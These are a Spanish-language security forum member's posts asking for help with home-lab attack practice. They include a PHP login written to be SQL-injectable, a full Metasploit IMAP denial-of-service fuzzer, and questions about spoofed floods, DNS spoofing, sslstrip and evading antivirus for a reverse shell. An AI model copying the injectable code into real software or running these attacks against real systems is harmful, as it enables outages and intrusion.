This site uses cookies own and third. If you continue to browse consider to accept the use of cookies. OK More Info.

Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.

Topics - nexusz

Pages: [1]
1
Buenas,les queria hacer una consulta,me estoy por comprar una notebook con un procesador  INTEL CORE I3-6100U, 4GB de memoria RAM ,queria saber si con el voy a poder correr bien las maquinas virtuales si les instalo kali linux o windows 7 o 8.1 porque con la notebook que tengo ahora si abro una maquina virutal que tiene instalado windows 7 o kali linux se tilda muchisimo y me es imposible trabajar.

desde ya gracias y un saludo

2
Dudas y pedidos generales / [SOLUCIONADO] Problema con PHP y Postgresql
« on: November 23, 2016, 11:06:00 pm »
Buenas tengo un problema con php y postgresql, estoy haciendo un login vulnerable a sql injection para practicar y me topo con estos errores:
Code: You are not allowed to view links. Register or Login
Warning: pg_exec(): Query failed: ERROR: no existe la relación «productos» LINE 1: SELECT * FROM Productos WHERE Nombre='admin' and Contracena=... ^ in C:\xampp\htdocs\conpostgres.php on line 17

Warning: pg_numrows() expects parameter 1 to be resource, boolean given in C:\xampp\htdocs\conpostgres.php on line 24
el codigo de el login es el siguiente:

este el login.php
Code: You are not allowed to view links. Register or Login
<?php 
session_start
();

include 
'conpostgres.php';
// si se ha rellenado anteriormente el formulario ,comprobar los datos

if(isset($_POST['nombre'])){
//sentencia sql a ejecutar
$sql="SELECT * FROM Productos WHERE Nombre='".$_POST["nombre"]."' and Contracena='".$_POST["pwd"]."'";

$resultado=ejecutar_SQL($conexion,$sql);

//si hay filas,los datos de accseso eran correctos
if(numero_filas($resultado)!=0){
//obtener los datos de l usuario logado
$fila=$fila($resultado,0);
// almacenar su ID en los datos de la sesion
$_SESSION['usuario']=$fila['id'];

// dar la bienvenida
echo "<h3>Login OK</h3>
[email protected],"
.$fila['desc']."<br>
Pulse <a href=producto.php>aqu&iacute;</a> para continuar."
;
}else {
echo "<h3>Login fallido</h3>";
}


}
// si no se ha iniciado sesion,mostrar un formulario de logon

if(!isset($_SESSION['usuario'])){
print '<form method="POST" action="login.php">
<table border="1">
<tr><td colspan="2">Introduzca sus datos de acceso</td></tr>
<tr><td>Nombre:&nbsp;</td><td><input type="text" name="nombre" id="nombre"></td></tr>
<tr><td>Clave:&nbsp;</td><td><input type="password" name="pwd" id="pwd"></td></tr>
</table>
<input type="submit" value="Enviar">
</form>'
;
}
?>


y este es para la conexion:
Code: You are not allowed to view links. Register or Login
<?php
// abrir conexion con la base de datos

function conectar($host,$db,$usuario,$contraceña){
return pg_connect("host=$host dbname=$db user=$usuario password=$contraceña");
}


// cerrar conexion
function cerrar_conexion($conexion){
pg_close($conexion);
}

// ejecutar una consulta sql sobre abre unaconexion

function ejecutar_SQL($conexion,$cadena){
return 
pg_exec($conexion,$cadena);
}


//obtner numeros de filas de u nresultado

function numero_filas($resultado){
return pg_numrows($resultado);
}

// obtiene la fila numero $i de un resultado
// para obtener un campo de usa la sintaxis $fila_obtenida['nmbre de la columna']

function fila($resultado,$i){
return pg_fetch_array($resultado,$i);

}

$conexion=conectar('localhost','postgres','postgres','123456');

?>

que puede ser? porque cree la base de datos bien con las tablas correctas,uso xampp

un saludo y gracias

3
Dudas y pedidos generales / Problemas con iptables
« on: September 20, 2016, 12:57:36 am »
Buenas quiero poner unos comandos con iptables porque estoy armando un programa que hace dns spoof y me tope con un problema cuando pongo el siguiente comando:iptables -F -t nat
en la consola me sale el siguiente error:
Quote
iptables v1.4.14: can't initialize iptables table `NAT': Table does not exist (do you need to insmod?)
Perhaps iptables or your kernel needs to be upgraded.

me dice que la tabla nat no existe,que puede ser?
la version de mi linux y kernel es la siguiente
Quote
Linux version 3.13.0-3-686-huayra ([email protected]) (gcc version 4.7.2 (Debian 4.7.2-5) ) #1 SMP Fri Jan 31 12:49:54 ART 2014

desde ya gracias y un saludo

4
Dudas y pedidos generales / Como usar IPV6?
« on: September 10, 2016, 02:49:19 pm »
Buenas,queria hacerles una consulta,como navego con ipv6?, lo tengo habilitado pero cuando desactivo ipv4 me pone coneccion limitada,me fijo con un ip config y el router no me da ninguna puerta de enlace y los servidores dns tampoco, solamente me aparece el dns de ipv4,puede que slaac este desactivado?mi sistema operativo es un windows 10.

desde ya gracias

5
Dudas y pedidos generales / Error a iniciar servidor DHCP en kali linux
« on: August 22, 2016, 05:41:11 am »
Buenas estoy en kali linux intentado crear un AP falso(para practicar) y estuve configurando un servidor DHCP que se llama isc-dhcp-server, pero al momento de iniciarlo me tira el siguiente error:
Quote
@You are not allowed to view links. Register or Login:~# /etc/init.d/isc-dhcp-server start
[....] Starting isc-dhcp-server (via systemctl): isc-dhcp-server.serviceJob for isc-dhcp-server.service failed because the control process exited with error code.
See "systemctl status isc-dhcp-server.service" and "journalctl -xe" for details.
 failed!
cuando ejecuto el comando status me dice lo siguiente:
Quote
root@You are not allowed to view links. Register or Login:~# /etc/init.d/isc-dhcp-server status
● isc-dhcp-server.service - LSB: DHCP server
   Loaded: loaded (/etc/init.d/isc-dhcp-server; generated; vendor preset: disabled)
   Active: failed (Result: exit-code) since lun 2016-08-22 05:05:43 ART; 4min 9s ago
     Docs: man:systemd-sysv-generator(8)
  Process: 3091 ExecStart=/etc/init.d/isc-dhcp-server start (code=exited, status=1/FAILURE)

ago 22 05:05:43 kali isc-dhcp-server[3091]: If you think you have receive...r
ago 22 05:05:43 kali isc-dhcp-server[3091]: than a configuration issue pl...g
ago 22 05:05:43 kali isc-dhcp-server[3091]: bugs on either our web page a...e
ago 22 05:05:43 kali isc-dhcp-server[3091]: before submitting a bug.  The...r
ago 22 05:05:43 kali isc-dhcp-server[3091]: process and the information w....
ago 22 05:05:43 kali isc-dhcp-server[3091]: exiting.
ago 22 05:05:43 kali systemd[1]: isc-dhcp-server.service: Control proces...=1
ago 22 05:05:43 kali systemd[1]: Failed to start LSB: DHCP server.
ago 22 05:05:43 kali systemd[1]: isc-dhcp-server.service: Unit entered f...e.
ago 22 05:05:43 kali systemd[1]: isc-dhcp-server.service: Failed with re...'.
Hint: Some lines were ellipsized, use -l to show in full.

que puede ser?, les dejo la configuracion que realize
el archivo dhcpd.conf contiene lo siguiente:

Quote
    ddns-update-style ad-hoc;
    default-lease-time 600;
    default-lease-time 7200;
    authoritative;
    subnet 192.168.1.0 netmask 255.255.255.0 {
    option subnet-mask 255.255.255.0;
    option broadcast-address 192.168.1.255;
    option routers 192.168.1.1;
    option domain-name "duridia";
    option domain-name-servers 192.168.1.1;
    range 192.168.1.230 192.168.1.210;

}
y el archivo isc-dhcp-server
Quote
# Defaults for isc-dhcp-server (sourced by /etc/init.d/isc-dhcp-server)

# Path to dhcpd's config file (default: /etc/dhcp/dhcpd.conf).
#DHCPDv4_CONF=/etc/dhcp/dhcpd.conf
#DHCPDv6_CONF=/etc/dhcp/dhcpd6.conf

# Path to dhcpd's PID file (default: /var/run/dhcpd.pid).
#DHCPDv4_PID=/var/run/dhcpd.pid
#DHCPDv6_PID=/var/run/dhcpd6.pid

# Additional options to start dhcpd with.
#       Don't use options -cf or -pf here; use DHCPD_CONF/ DHCPD_PID instead
#OPTIONS=""

# On what interfaces should the DHCP server (dhcpd) serve DHCP requests?
#       Separate multiple interfaces with spaces, e.g. "eth0 eth1".
INTERFACESv4="eth0 wlan0"
INTERFACESv6=""

ya intente haciendo apt-get upgrade, apt-get update y sigue tirandome el mismo error, que puede estar fallando?

Desde ya gracias

6
Buenas,estoy aprendiendo seguridad wireless pero la verdad no se si mi tarjeta no es compatible o le falta instalar drivers,puedo ponerla en modo monitor pero cuando envio paquetes de fakeauth no funciona , aveces no detecta los dispositivos conectados en el AP, y aveces captura los handshake y aveces no,los paquetes de desauth se envian perfectamente,mi tarjeta de red es la siguiete:realtek RTL8723AE 802.11n
ustedes que opinan es no es compatible o le falta los drivers?
desde ya gracias un saludo

7
Dudas y pedidos generales / Error de DNS con ataque mitmf ssltrip+ hsts
« on: August 08, 2016, 03:08:00 am »
Buenas,estoy practicando en mi maquina virtual los ataques arp spoofing con ssltrip+ hsts, para eso uso el programa MITMF, pero hay un problema cuando lanzo el ataque hasta ahi todo bien pero cuando voy a la maquina victima intento entrar en algun sitio web para ver si bypasseo https, veo que no tuvo efecto el ataque y se me pone lenta la conexion del equipo victima,cuando me fijo en la maquina atacante veo que en el programa mitmf sale el siguiente error:[dns] could not proxy request:time out
como que no hace la resolucion de dns cierto?
les dejo una imagen del error

desde ya gracias
un saludo

8
Dudas y pedidos generales / Ataques a protocolos de enrutamiento
« on: August 03, 2016, 05:57:08 am »
Buenas,queria hacerles una consulta existen ataques a los protocolos de enrutamientos? porque me puse a buscar por internet y la verdad encontre muy poca info,solamente de RIPv1, nisiquiera videos nada,alguno que este avanzado con el tema seguridad en redes me puede ayudar?
desde ya gracias
un saludo

9
Dudas y pedidos generales / SQL injection tuto completo
« on: July 23, 2016, 11:19:43 pm »
Buenas,queria preguntarles donde puedo conseguir un libro o articulos sobre sql injection completo porque vi algunos en el foro pero son muy basicos y hay un unos sql injection que se aplican pero noentiendo porque se aplica asi(no se si me entienden).

desde ya gracias

10
Dudas y pedidos generales / Dudas sobre redes
« on: June 27, 2016, 05:12:34 am »
Buenas,estoy estudiando redes y tengo varias dudas,voy por la primera.
PSK clave precompartida:dice que comparte la clave tanto el AP como el cliente cierto? pero que clave comparte, la contraceña de la red o las llaves criptograficas?.

La segunda el protocolo de autenticacion EAP dice que se usa para servidores radius u otros, se usa para comunicarse y permitir la autenticacion con cualquier servidor 802.1x pero como funciona internamente, por desafio-respuesta como ms-chap? porque busque y no encuentro informacion clara.

Otra duda sobre PAP,CHAP,EAP,EAP-TLS,etc son todos protocolos de autenticacion?.

Otra duda es como funciona la autenticacion de radius con el autenticador y el suplicante?porque por lo que he visto radius usa desafio-respuesta.

la autenticacion por psk funciona asi:
Quote
La estación que quiere autenticarse (cliente), envía una trama AUTHENTICATION REQUEST indicando que quiere utilizar una “clave compartida”. El destinatario (AP) contesta enviando una trama que contiene 128 octetos de texto (desafío) al cliente
El texto del desafío se genera utilizando el PRNG (generador de números pseudoaleatorios de WEP) con la clave compartida y un vector de inicialización (IV) aleatorio.
Una vez el cliente recibe la trama, copia el contenido del texto de desafío en el payload de una nueva trama, que encripta con WEP utilizando la clave compartida (passphrase) y añade un nuevo IV (elegido por el cliente). Una vez construida esta nueva trama encriptada, el cliente la envía al AP, y éste desencripta la trama recibida y comprueba que:
- El ICV (Integrity Check Value) sea valido (CRC de 32 bits).
- El texto de desafío concuerde con el enviado en el primer mensaje.

Si la comprobación es correcta, se produce la autenticación del cliente con el AP y entonces se vuelve a repetir el proceso pero esta vez el primero que manda la trama con el AUTHENTICATION REQUEST es el AP. De esta manera se asegura una autenticación mutua

ese desafio que le manda al cliente con la clave precompartida, a que hace referencia eso, a una llave criptografica o a la contraseña de la red?


Desde ya gracias ;D
un saludo a todos

11
Dudas y pedidos generales / Duda sobre VPN
« on: June 01, 2016, 09:28:12 pm »
Buenas,estoy aprendiendo teoria sobre vpn pero la verdad que tengo todos los conocimientos desordenados,GRE porque se usa en pptp y no l2tp? PPP es un protocolo de autenticacion y hay otros como PAP, SPAP, CHAP, MS-CHAP / MS-CHAPv2 y EAP-TLS? ipsec es un protocolo de seguridad como MS-CHAPv2 ? se los conceptos de cada cosa pero tengo toda la informacion desordenada la verdad, no se puede usar pptp con ipsec?

gracias por su ayuda y un saludo

12
Dudas y pedidos generales / Evadir Antivirus
« on: May 29, 2016, 06:15:04 pm »
Buenas,genere una shell reverse_tcp con msfvenom, pero veo que me la detecta casi todos los antivirus,estoy viendo como evadir los av,pero no encuentro una solucion,proble con shellter pero me daña al shell no me la ejecuta,el hanzoinjected cuando lo ejecuto me dice que no es una aplicacion valida en win32 cosa q me parece re raro, probe con SET toolkit pero me la detecta todo los antivirus,la verdad no se con que programa probar,alguno me puede dar una mano?

desde ya gracias un saludo

13
Dudas y pedidos generales / Error al agregar modulo en metasploit
« on: May 18, 2016, 04:17:58 am »
Buenas,estoy haciendo el curso de metasploit de ofensive security,queria agregar un fuzzer para imap que es el siguiente codigo:
Code: You are not allowed to view links. Register or Login
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 > Msf::Auxiliary

    include Msf::Exploit::Remote::Imap
    include Msf::Auxiliary::Dos

    def initialize
        super(
            'Name'           => 'Simple IMAP Fuzzer',
            'Description'    => %q{
                                An example of how to build a simple IMAP fuzzer.
                                Account IMAP credentials are required in this fuzzer.
                        },
            'Author'         => [ 'ryujin' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 1 $'
        )
    end

    def fuzz_str()
        return Rex::Text.rand_text_alphanumeric(rand(1024))
    end

    def run()
        srand(0)
        while (true)
            connected = connect_login()
            if not connected
                print_status("Host is not responding - this is G00D ;)")
                break
            end
            print_status("Generating fuzzed data...")
            fuzzed = fuzz_str()
            print_status("Sending fuzzed data, buffer length = %d" % fuzzed.length)
            req = '0002 LIST () "/' + fuzzed + '" "PWNED"' + "\r\n"
            print_status(req)
            res = raw_send_recv(req)
                if !res.nil?
            print_status(res)
                else
                    print_status("Server crashed, no response")
                    break
                end
            disconnect()
        end
    end
end

lo guardo en formato .rb y lo copio en la carpeta de metasploit en la siguiente ruta: auxiliary/dos/windows/imap/
y ejecuto metasploit pongo el siguiente comando: use auxiliary/dos/windows/imap/nombredemifuzzer.rb
y me dice q fallo el modulo como que no lo reconoce.que puede ser?

desde ya gracias

14
Dudas y pedidos generales / Metasploit falla los modulos
« on: May 13, 2016, 12:09:12 am »
Buenas, devuelta yo jaja estoy plagado de errores esta vez es metasploit, lo tengo en dos maquina virtuales y me fallan los modulos, escribo:
use auxiliary y me salta el siguiente error:[-] Failed to load module: auxiliary
en las dos maquinas virtuales me salta ese error tambiem probe poniendo use exploits y el mismo error salta,lo descargue en windows en mi maquina de escritorio probe, salta el mismo error, que puede ser?

desde ya gracias
un saludo

15
Buenas,estoy usando macchanger para cambiar la mac de mi pc pero ahi un problema me tira el siguiente error:
Could not change MAC: interface up or insufficient permissions: Cannot assign requested address

hago el procedimiento correctamente , primero desconecto internet,despues desactivo el interfaz con: sudo ifconfig wlan0 down

despues utlilizo el comando: sudo macchanger --mac 01:02:03:04:05:06 wlan0
y me tira el error que mostre arriba.
que puede ser eso?

un saludo a todos y gracias.

16
Buenas, estoy estudiando el tema de MAC spoofing que dice que podes suplantar la mac de otra pc de tu red por lo tanto tenes la ip de la otra maquina cierto? un arp spoofing es casi lo mismo la unica diferencia que enves de suplantar la mac lo que hace es decirle al router por medio del protocolo arp que esa ip pertenece a la mac de mi pc? digamos muy parecido son, el punto es que tipos de ataques se puede hacer con una mac spoofeada que con un arp spoofing no se pueda hacer? espero que se haya entendido mi duda.

desde ya gracias y un saludo :D

17
Dudas y pedidos generales / IP Spoofing fuera de LAN
« on: May 05, 2016, 12:59:48 am »
Buenas, estoy investigando sobre ataques DOS y DDOS , probe en mi red de mandar un ataque DOS syn amplificado spoofeando la ip y la verdad que es muy potente me dejo la conexion fuera de linea en menos de 5 min, mi duda es se puede spoofear una IP fuera de lan? y si es asi como seria? esto no es para hacer daño a nadie simplemente con fines educativos, con hping3 se podria spoofear una ip fuera de lan?

desde ya gracias y un saludo

18
Buenas,estoy aprendiendo sobre seguridad informatica,me puse a estudiar sobre ataques DOS y DDOS como funcionan internamente y los tipos de ataques que existen,monte dos maquina virtuales una con windows 7 con web IIS,y otra con Windows 10 y un server IIS tambien,use varios programas para atacarlas como :XOIC,LOIC,Pyloris,slowloris,hping3,Hive Mind LOIC,v4Ddos y la verdad ninguno logro hacerle ni cosquillas a las maquinas virtuales, ninguno la dejo fuera de servicio,instale wireshark me fije y los paquetes del ataque llegaban bien,ataque por http request,udp,tcp,icmp pero nada,alguno que tenga conocimientos sobre el tema me pueda decir que esta fallando?

desde ya gracias
un saludo  ;D

19
Dudas y pedidos generales / Problemas al compilar programa smurf6
« on: April 30, 2016, 05:48:38 pm »
Buenas, estoy intentado compilar el programa smurf6 en linux, es un programa para hacer un smurf attack, pero me tira el siguiente error:

Code: You are not allowed to view links. Register or Login
/tmp/ccyrm1sC.o: En la función `main':
smurf6.c:(.text+0x103): referencia a `thc_ipv6_rawmode' sin definir
smurf6.c:(.text+0x12c): referencia a `thc_get_own_ipv6' sin definir
smurf6.c:(.text+0x167): referencia a `thc_resolve6' sin definir
smurf6.c:(.text+0x18a): referencia a `thc_resolve6' sin definir
smurf6.c:(.text+0x19f): referencia a `thc_resolve6' sin definir
smurf6.c:(.text+0x1d9): referencia a `thc_create_ipv6_extended' sin definir
smurf6.c:(.text+0x20f): referencia a `thc_add_icmp6' sin definir
smurf6.c:(.text+0x235): referencia a `thc_generate_pkt' sin definir
smurf6.c:(.text+0x288): referencia a `thc_send_pkt' sin definir
collect2: error: ld returned 1 exit status

este es el código fuente: You are not allowed to view links. Register or Login

Saben que puede ser porque hace varios dias que me estoy rompiendo la cabeza y no se que es
Un saludo y gracias.

Pages: [1]